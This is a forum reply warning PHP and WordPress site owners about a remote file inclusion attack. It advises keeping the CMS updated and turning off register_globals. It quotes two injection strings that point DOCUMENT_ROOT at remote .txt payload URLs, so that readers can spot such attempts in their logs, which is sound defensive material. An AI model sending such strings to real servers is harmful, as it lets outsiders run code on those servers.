Get exclusive CAP network offers from top brands

View CAP Offers

Reply To: WordPress Hack – Warning

[bsa_pro_ad_space id=2]
#776808
Anonymous
Inactive

This is a new hacking attempt, a PHP injection kinda hack. And unfortunately not just for WP users. Non-wp users can be injected if their server allows a non-local call for php files and their code allows executables.

It is advised to keep your CMS up-to-date all the time, but the first place I would see around in your vhost config, and make sure the register globals php flag is turned off. So noone can execute anything nasty just by injecting your php files with executable SERVER[DOCUMENT_ROOT] commands.

Check your webstats and look for rows like this in the pages your visitors seen list:
DOCUMENT_ROOT=http://​artemcity.​ru/​r0x.​txt?​?
?​_SERVER[DOCUMENT_ROOT]=http://​http://www.​topyn.​com/​ips.​txt?

An injection attempt will look something like those above.